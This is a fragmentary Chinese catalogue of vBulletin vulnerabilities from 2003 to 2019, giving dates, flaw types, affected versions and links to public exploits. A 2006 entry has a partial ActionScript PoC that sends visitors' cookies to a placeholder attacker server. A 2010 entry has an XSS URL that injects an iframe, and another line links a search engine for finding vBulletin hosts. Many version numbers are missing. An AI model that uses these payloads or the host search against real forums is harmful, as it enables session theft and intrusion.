Date: 
2004.11

漏洞类别：

SQL 注入

Date:

2005.2

漏洞类别：

RCE

Date:

2005.2

类型：

RCE

Date:

2005.2

Date：

2005.8

类型：

RCE

Date：

2005.8

类型：

RCE

漏洞类别：

SQL 注入

Date:

2006.4

漏洞类别：

RCE

Date:

2006.10

漏洞类别：
远程溢出

Date：

2006.11

漏洞类别：

嵌入恶意代码

影响范围：

Microsoft IE在处理vBulletin的附件时存在漏洞，远程攻击者可能利用此漏洞在用户机器上执行恶意代码。

远程攻击者可以将恶意代码保存为.pdf文件并在张贴时做为附件上传到论坛，这样用户在IE中打开附件时就会导致执行任意代码。

VBulletin VBulletin 3.5. 目前厂商还没有提供补丁或者升级程序

Date:

2006.12

漏洞类别：

SQL 注入

影响范围：

vBulletin在处理恶意SWF文件时存在漏洞，远程攻击者可能利用此漏洞获取用户机器的敏感信息。

如果攻击者能够向vBulletin上传包含有恶意actionscript帧的SWF文件的话，就可能执行跨站脚本攻击，导致在日志文件中泄露基于cookie的认证凭据。

VBulletin VBulletin <= 3.6. 目前厂商还没有提供补丁或者升级程序

PoC:

getURL(&quot;javascript:function blab(){}var scriptNode = document.createElement('script');document.getElementsByTagName('body')[].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+

Date：

提交时间：2007.02

漏洞类别：

SQL 注入

Date：

2007.3

漏洞类别：

SQL 注入

Date：2007.05

漏洞类别：

远程文件包含

Date：

2007.07

漏洞类别：

SQL 注入

Date：

2008.06

漏洞类别：

嵌入恶意代码

影响范围：

vBulletin管理控制面板（ACP）的登录页面没有正确地验证redirect参数，远程攻击者可以通过向论坛提交使用data: URI主题Base64编码的登录请求执行跨站脚本攻击。

VBulletin VBulletin 3.7. VBulletin VBulletin 3.6.

Date：

2008.07

漏洞类别：

SQL 注入

影响范围：

vBulletin管理控制面板的日志查看页面存在跨站脚本漏洞。如果用户请求了缺失的页面时，就会在管理区域创建日志，但没有过滤检查该日志的输入。脚本名称是从basename(PHP_SELF)获得的，操作是从_REQUEST['do']获得的，这两种方式都可能导致跨站脚本攻击。

VBulletin VBulletin 3.7.2 VBulletin VBulletin 3.6.10 PL2

Date：

2008.8

漏洞类别：

跨站脚本

影响范围：

vBulletin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

vBulletin 3.7.2 Patch Level 1 and vBulletin 3.6.10 Patch Level 3 are vulnerable; other versions may also be affected.

VBulletin VBulletin 3.7.2 PL1 VBulletin VBulletin 3.6.10 PL3

Date：

2008.11

漏洞类别：

SQL 注入

影响范围：

vBulletin论坛的admincp/admincalendar.php文件没有正确地验证用户提交参数：

-------------------[original source code]------------------

if($_POST['do'] == 'saveholiday') { $vbulletin->input->clean_array_gpc('p', array( 'holidayid' => TYPE_INT, 'holidayinfo' => TYPE_ARRAY, 'month1' => TYPE_INT, 'day1' => TYPE_INT, 'month2' => TYPE_INT, 'day2' => TYPE_INT, 'period' => TYPE_INT, 'title' => TYPE_STR, 'description' => TYPE_STR, )); .. $db->query_write(" UPDATE " . TABLE_PREFIX . "holiday SET allowsmilies = " . $vbulletin->GPC['holidayinfo']['allowsmilies'] . ", recuroption = '" . $vbulletin->GPC['holidayinfo']['recuroption'] . "', recurring = " . $vbulletin->GPC['holidayinfo']['recurring'] . " WHERE holidayid = " . $vbulletin->GPC['holidayid'] );

------------------[/original source code]------------------

可见未经任何过滤便在UPDATE查询中使用了来自$_POST的数组类型变量holidayinfo，这允许远程攻击者通过提交恶意请求执行SQL注入攻击。

VBulletin 3.7. pl1

Date：

2008.11

漏洞类别：

XSS

Date：

2008.11

漏洞类别：

SQL 注入

Date：

2009.4

漏洞类别：

嵌入恶意代码

影响范围：

vBulletin管理控制台的admincp/usertitle.php、admincp/image.php模块没有正确地验证用户所提交的 Users、Icons、Smilies、avatar等参数，远程攻击者可以提交包含有脚本代码的恶意标题名称导致注入并执行任意HTML代码。

VBulletin 3.8.0 RC2

Date：

2009.5

漏洞类别：

SQL 注入

Date：

2009.6

漏洞类别：

嵌入恶意代码

Date：

2009.10

漏洞类别：

跨站脚本

Date：

2009.12

漏洞类别：

SQL 注入

Date:

2009.12

漏洞类别：

SQL 注入

Date:

2010.1

漏洞类别：

跨站脚本

Date:

2010.1

漏洞类别：

SQL 注入

Date:

2010.3

漏洞类别：

跨站脚本

影响范围：

search.php在对用户提交数据处理上存在安全漏洞。

http://www.vbulletin.com/forum/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query=%22%3E%3Ciframe%20src=http://www.gohack.org%3E

vBulletin Version 4.0. 等待官方发补丁

Date：

2010.3

漏洞类别：

跨站脚本

影响范围：

当search_type设置为1的时候，vBulletin没有正确的过滤提交给search.php页面的query参数便返回给了用户，远程攻击者可以通过提交恶意参数请求执行跨站脚本攻击，导致在用户浏览器会话中执行任意HTML和脚本代码。

VBulletin 4.0. 

Date：

2010.04

漏洞类别：

其他类型

Date：

2010.4

漏洞类别：

跨站脚本

Date：
2010.05

漏洞类别：

嵌入恶意代码

Date:

2010.5

漏洞类别：

嵌入恶意代码

影响范围：

vBulletin在创建使用自定义标签的内容时没有正确地解析BBCode，这允许攻击者注入任意HTML和脚本代码，当查看恶意数据时就会在用户浏览器会话中执行所注入的代码。

VBulletin 4.0.3 VBulletin 3.8.4 PL2

Date：

2010.8

漏洞类别：

越权访问

Date：

2010.9

漏洞类别：

拒绝服务

Date:

2010.11

漏洞类别：

跨站脚本

Date:

2010.11

漏洞类别:

嵌入恶意代码

影响范围：

vBulletin的Profile Customization功能中存在持续性跨站脚本漏洞。在配置文件的自定义字段，可以输入颜色代码、rgb代码和图形。由于url()函数没有正确的过滤用户输入，导致vBulletin受跨站脚本攻击的影响。

VBulletin 4.0. 

Date:

2011.03

漏洞类别：

SQL 注入

Date:

2011.6

漏洞类别：

SQL 注入

Date:

2011.7

漏洞类别：

SQL 注入

Date：

2011.11

漏洞类别：

远程文件包含

影响范围：

vBulletin在实现上存在多个远程文件包含漏洞，攻击者可利用这些漏洞获取敏感信息或在服务器进程中执行任意脚本代码，控制应用程序或计算机。

VBulletin 4.1.7

Date:

2012.1

漏洞类别：

越权访问

影响范围：

vBulletin blog_post.php脚本不正确检查权限，远程攻击者可以利用漏洞张贴博客日志  vBulletin .x vBulletin Publishing Suite .x

Date:

2012.4

漏洞类别：
SQL 注入

影响范围：

VBulletin announcement.php脚本不正确处理提交给announcementid的参数，攻击者可以提交恶意SQL查询，获得敏感数据库信息或控制应用系统  VBulletin 4.1.

Date:

2012.5

漏洞类别：

远程文件包含

Date:

2012.6

漏洞类别：

SQL 注入

Date:

2012.9

漏洞类别：

SQL 注入

影响范围：

 VBulletin 'blog_plugin_useradmin.php'脚本不正确过滤用户提交的输入，允许攻击者利用漏洞进行SQL注入攻击，可获得数据库信息或控制应用系统。  VBulletin 4.1. 

Date:

2012.12

漏洞类别：

SQL 注入

Date:

2013.4

漏洞类别：

SQL 注入

影响范围：

VBulletin 5.0. Beta  - 5.0. Beta 28及其他版本在 'nodeid' 参数的实现上存在SQL注入漏洞，攻击者可利用此漏洞破坏应用，执行未授权操作

Date:

2013.7

漏洞类别：

SQL 注入

Date:

2013.10

漏洞类别：

越权访问

影响范围：
vBulletin 4.x.x及5.x.x允许攻击者利用vBulletin配置机制创建另一个管理员账户，即可具有vBulletin应用的完全控制权，然后控制其所支持的站点。要利用此漏洞，攻击者需要具有vBulletin upgrade.php准确的URL及用户ID 0 VBulletin 5.x VBulletin 4.x

Date:

-

漏洞类别：

其他类型

Date:

2014.7

漏洞类别：

其他类型

Date:

2004.12

漏洞类别：

其他类型

Date:

-

漏洞类别：

其他类型

Date:

2014.7

漏洞类别：

其他类型

Date：

-

漏洞类别：

其他类型

Date:

-

漏洞类别：

其他类型

Date:

2014.7

漏洞类别：

其他类型

Date:

-

漏洞类别：

其他类型

Date:

-

漏洞类别：

其他类型

Date:

-

漏洞类别：

其他类型

Date:

2014.7

漏洞类别：

其他类型

Date:

2014.7

漏洞类别：

其他类型

Date:

2014.7

漏洞类别：

其他类型

Date:

2007.2

漏洞类别：

其他类型

Date:

2008.10

漏洞类别：

其他类型

Date:

2014.7

漏洞类别：

其他类型

Data:

2014.7

漏洞类别：

其他类型

Date:

2014.7

漏洞类别：

其他类型

Date:

2014.7

类型：

XSS Vulnerabilities

受影响版本：

vBulletin 3.5.

Date：

-

类型：

XSS Vulnerability

受影响版本：

vBulletin 3.0.

Date:

2014.7

漏洞类型：

SQL Injection Vulnerability

受影响版本：

vBulletin 2.3 .x

Date：

2010.3

漏洞类型：

Local File Inclusion Vulnerability

受影响版本：

vBSEO 3.1. 

Date:

2010.3

漏洞类型：

Title XSS Vulnerability

受影响版本：

Vbulletin Blog 4.0. 

Date:

2010.4

类型：

DOS

PoC:

• http://www.exploit-db.com/exploits/12154

Date:

2014.7

类型：

DOS

Date:

2010.4

漏洞类型：

SQL Injection Exploit

受影响版本：

MusicBox 3.3 

Date:

2014.7

漏洞类型：

faq.php Information Disclosure Vulnerability

受影响版本：

vBulletin(R) 3.8.

Date:

2010.8

漏洞类型：

Registration Bypass Vulnerability

受影响版本：

vBulletin 3.8. & 3.8. 

Date:

2010.11

漏洞类型：

PL1 XSS Filter Bypass within Profile Customization

受影响版本：

vBulletin 4.0. 

Date:

2005.2

漏洞类型：

vBulletin misc.php Template Name Arbitrary Code Execution

受影响版本：

All versions of vBulletin prior to 3.0. are affected.

Date:

2011.3

漏洞类型：

EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability



受影响版本：

vBulletin 3.8.x 

Date:

2011.3

漏洞类型：

Local File Read

受影响版本：

EggAvatar 2.3. for vBulletin 3.8.x 

Date:

2011.4

漏洞类型：

Point Market System .1x vbulletin plugin SQLi Vulnerability

受影响版本：

.1x

Date:

2011.5

漏洞类型：

vBulletin 4.0.x => 4.1. - (search.php) SQL Injection Vulnerability

受影响版本：

4.0.x

Date:

2011.7

漏洞类型：

(messagegroupid) SQL Injection Vulnerability 

受影响版本：

Vbulletin 4.0.x => 4.1. 

Date:

2012.8

类型：

SQL Injection


影响版本:

4.0.+

Date:
2003.8

漏洞类型：
Register.PHP HTML Injection Vulnerability

影响范围：

vBulletin 3.0

Date:

2004.2

类型：

Cross-Site Scripting Vulnerability

影响版本：

VBulletin 1.0/1.1/2.0.x/2.2.x

Date：

2004.12

类型：
Search.PHP Cross-Site Scripting Vulnerability

影响版本：

VBulletin 3.0

Date:
2004.3

漏洞类型：
ForumDisplay.PHP Cross-Site Scripting Vulnerability

影响版本：

VBulletin 3.0 

Date:

2004.3

漏洞类型：

ShowThread.PHP Cross-Site Scripting Vulnerability

影响版本：
VBulletin 3.0 

Date:

2004.03

漏洞类型：
Private.PHP Cross-Site Scripting Vulnerability

影响版本：

VBulletin 2.x 

Date：

2004.5

类型：
'index.php' User Interface Spoofing

影响版本：

vBulletin 1.0/2.x/3.0

Date:
2004.6

类型：

newreply.php WYSIWYG_HTML Parameter XSS

影响版本：
VBulletin 3.0. 

Date:

2013.3

类型：

SQL Injection



影响版本：

vBulletin 5.0. Beta  - 5.0. Beta  

Date:
2005.9

类型：

joinrequests.php request Parameter SQL Injection

影响版本：
VBulletin 1.0. lite/.x/3.0 

Date:
2005.9

类型：

/admincp/user.php Multiple Parameter SQL Injection

影响版本：
VBulletin 1.0.1 lite/2.x/3.0 

Date:
2005.9

类型：

'/admincp/usertitle.php?usertitleid' SQL Injection

影响版本：

vBulletin 1.0.1 lite/2.x/3.0

Date:
2005.9

类型：

'/admincp/usertools.php?ids' SQL Injection

影响版本：

vBulletin 1.0.1 lite/2.x/3.0 -

Date:
2005.9

类型：

影响版本：

vBulletin 1.0.1 lite/2.x/3.0 -

Date:
2005.9

类型：

影响版本：

VBulletin 1.0.1 lite/2.x/3.0

Date:
2005.9

类型：

/admincp/user.php email Parameter XSS

影响版本：

VBulletin 1.0.1 lite/2.x/3.0

Date:
2005.9

类型：

/admincp/language.php goto Parameter XSS

影响版本：

VBulletin 1.0.1 lite/2.x/3.0

Date:
2005.9

类型：

/admincp/modlog.php orderby Parameter XSS

影响版本：

VBulletin 1.0.1 lite/2.x/3.0

Date:
2005.9

类型：
/admincp/template.php' Multiple Cross-Site Scripting Vulnerabilities

影响版本：

VBulletin 1.0.1 lite/2.x/3.0

Date:

2013.7

类型：

vBulletin Advanced User Tagging Mod - Stored XSS Vulnerability

影响版本：

Version: vBulletin 3.8.x, vBulletin 4.x.x 

Date:

2013.7

类型：

vBulletin vBShout Mod - Persistent Cross-Site Scripting

影响版本：

Version:vBulletin 3.8.x, vBulletin 4.x.x, vBulletin 5.x.x 

Date:
2006.02

类型：

vBulletin 3.5.2 - Event Title HTML Injection

影响版本：

This issue is reported to affect vBulletin 3.5.2. Earlier versions may also be affected.

Date:
2006.03

类型：

vBulletin 3.0/3.5 - 'profile.php?Email' HTML Injection

影响版本：

This issue is reported to affect vBulletin versions 3.0.12 through 3.5.3. Other versions may also be affected.

Date:
2006.04

类型：

vBulletin 3.5.1 - 'Vbugs.php' Cross-Site Scripting

影响版本：

Version 3.5.1 is vulnerable; other versions may also be affected.

Date:
2006.05

类型：

vBulletin 3.0.10 - 'Portal.php' SQL Injection

影响版本：

vBulletin 3.0.10

Date:
2006.06

类型：

vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities

影响版本：

vBulletin 2.x/3.x

Date:
2006.06

类型：

Vbulletin 3.0.9/3.5.x Member.PHP Cross-Site Scripting Vulnerability

影响版本：

Vbulletin 3.0.9/3.5.x 

Date:
2006.06

类型：

VBulletin 3.0.14 global.php Encoded URL XSS

影响版本：

VBulletin 3.0.14

Date:
2006.09

类型：

VBulletin 2.3.x Global.PHP SQL Injection Vulnerability

影响版本：

VBulletin 2.3.x

Date:

2006.11

类型：

vBulletin 3.6.x - Admin Control Panel Multiple Cross-Site Scripting Vulnerabilities

影响版本：

Versions 3.6.0 to 3.6.3 are vulnerable; other versions may also be affected.

Date:
2006.12

类型：

vBulletin 3.5.x/3.6.x - SWF Script Injection

影响版本：

vBulletin 3.5.x/3.6.x

Date:

-

类型：

vBulletin 3.6. - 'calendar.php' HTML Injection



影响版本：

vBulletin 3.6. 

Date:

-

类型：

vBulletin  - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit)

影响版本：

vBulletin 

Date:

.6

类型:

vBulletin 3.6./3.7. - 'redirect' Cross-Site Scripting

影响版本：

vBulletin 3.7. and 3.6. are vulnerable; other versions may also be affected.

Date:

2008-06

类型：

vBulletin 3.7.1 - Moderation Control Panel 'redirect' Cross-Site Scripting

影响版本：

vBulletin 3.7.1 PL1 and 3.6.10 PL1 are vulnerable; prior versions may also be affected. 

Date:

.7

类型：

影响版本：

Versions prior to vBulletin 3.7.2 PL1 and 3.6.10 PL3 are vulnerable. 

Date:
2008.8

类型：

vBulletin 3.6.10/3.7.2 - '$newpm[title]' Cross-Site Scripting

影响版本：

vBulletin 3.7.2 Patch Level 1 and vBulletin 3.6.10 Patch Level 3 are vulnerable; other versions may also be affected. 

Date：

-

类型：

vBulletin 4.0. - 'misc.php' SQL Injection

影响版本：

vBulletin 4.0.. is vulnerable; other versions may also be affected. 

Date:

-

类型：

vBulletin Adsense Component - 'viewpage.php' SQL Injection

Date:

-

类型：

vBulletin 3.5. - Multiple Cross-Site Scripting Vulnerabilities

影响版本：

These issues affect vBulletin 3.0. through 3.5..

Date:

2010.2

类型：

vBulletin 4.0. - Multiple Cross-Site Scripting Vulnerabilities

影响版本：

These issues affect vBulletin 4.0.; other versions may also be affected. 

Date：

-

类型：

vBulletin 4.0. - Search Cross-Site Scripting

影响版本：

vBulletin 4.0. is vulnerable. This issue does not affect vBulletin .x versions.

Date:

-

类型：

vBulletin Two-Step External Link Module - 'externalredirect.php' Cross-Site Scripting

Date:

2014.9

类型：

vBulletin 4.0.x - 4.1. (search.php, cat param) - SQL Injection Exploit

影响版本：

vBulletin 4.0.x - 4.1. 

Date:

2014.9

类型：

vBulletin 5.1.X - Persistent Cross Site Scripting

影响版本：

vBulletin 5.1.X

Date:

2014.11

类型：

vBulletin .x Verify Email Before Registration Plugin - SQL Injection

影响版本：

vBulletin .x

Date：
2014-11

类型：

vBulletin Tapatalk - Blind SQL Injection

Date:

2015.11

类型：

vBulletin 5.x.x 远程任意代码执行漏洞

影响版本：
vBulletin 5.x.x

社工：
http://www.zoomeye.org/search?q=app:vbulletin

Date:

2016.3

类型：

vBulletin rce 未授权访问和SSRF漏洞

Date:

2016.8

类型：

VBULLETIN 5.2./5.2./5.2. MEDIA UPLOAD SSRF PRIVILEGE ESCALATION

影响版本：

VBULLETIN 5.2./5.2./5.2.2

vBulletin <= 5.2.2

vBulletin <= 4.2.3

vBulletin <= 3.8.9

Date:

2016.8

类型：

vBulletin /forumrunner/request.php SQL注入漏洞

影响版本：

3.6.x ～ 4.2.1

4.2.2 ～ 4.2.2 Patch Level 5

4.2.3 ～ 4.2.3 Patch Level 1

Date:

2017.12

类型：

vBulletin cacheTemplates Unauthenticated Remote Arbitrary File Deletion(CVE--)

影响版本：

version .x

Date:

2017.12

类型：

vBulletin routestring Unauthenticated Remote Code Execution

影响版本：

version .x

Date:

2019.9

类型：

vBulletin .x 0day pre-auth RCE exploit

影响版本：

version .x  | versions from 5.0.0 till 5.5.4

Date:

2019.9

类型：

vBulletin .x 0day pre-auth RCE exploit

影响版本：

vBulletin .x  | from 5.0. till 5.5.4

PoC:
https://seclists.org/fulldisclosure/2019/Sep/31

Date:
2019.10

类型：

SQL | RCE

影响范围：

vBulletin <= 5.5. (updateAvatar) Remote Code Execution Vulnerability

EXP |Patch released:
https://www.exploit-db.com/exploits/47475